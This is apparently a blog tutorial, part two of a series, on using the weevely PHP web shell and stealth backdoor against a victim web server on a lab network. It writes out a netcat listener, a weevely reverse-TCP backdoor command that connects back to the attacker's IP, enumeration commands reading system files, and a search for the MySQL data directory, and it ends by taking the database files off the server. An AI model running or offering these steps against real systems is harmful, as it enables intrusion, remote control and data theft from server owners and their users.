Today I will continue the second part of how to use the PHP web shell and stealth backdoor : weevely. If you haven’t read my previous post, you can check and see the tutorial here.
The topics for hacking tutorial today is about how to do download the file using weevely php web shell, and also implement the reverse_tcp modules so we can connect directly to the target system to gain as much information as we need.
The victim IP address is 192.168.8.94 and attacker IP address is 192.168.8.92
7. Weevely web shell by default has a modules to execute shell :shell.sh <cmd>, but this method was a little bit inconvenient, becauseyou need to declare the module everytime you want to execute the shell.
The web shell was there.. 🙂
The default weevely modules to execute shell is good if you only run a single command like ps, whoami, etc, but if you try to run ls /etc/ it will throw an error.
8. The next step we will do the backdoor modules and will use NetCat to listen for an incoming connection in our attacker computer. Open a new terminal(CTRL + ALT + T) and run this command :
# nc -l -v -p 23
the port I use to listen is 23 (telnet).
9. Back to our Weevely terminal, after NetCat successfully listening on specific port, now we will make a reverse TCP connection to our attacker computer.
:backdoor.reverse_tcp 192.168.8.92 23
after executing the weevely backdoor modules, the terminal where we run the NetCat command to listen was ready to use.
10. Now we will try to collect some useful information from this server.
cat /etc/issue –> find linux distribution type, what version?
cat /proc/version –> what’s the kernel version, is it 64 bit or 32 bit?
you can do more enumeration(collect data) to find out information as much as possible about this server. (I will discuss this on another post)
11. When doing enumeration, I found that this server is a web server with MySQL database and PHPMyadmin installed. Now we will try to read the configuration on this server.
12. Oops I’m forget to write down how to download file from this web server to our local directory using weevely php web shell and stealth backdoor 😀 . We already know that this server perhaps use MySQL, but we will find out more about the database location in this server.
ps -eo cmd,args | grep mysql
and finally we find that database data directory pointing to /opt/lampp/var/mysql.
13. Now let’s dig into this folder and find whether there’s valuable data or not.
14. Yes there’s some valuable data there 🙂 , the next step is we need to bring that data into our computer by downloading it.
15. Done 🙂
hope it useful 🙂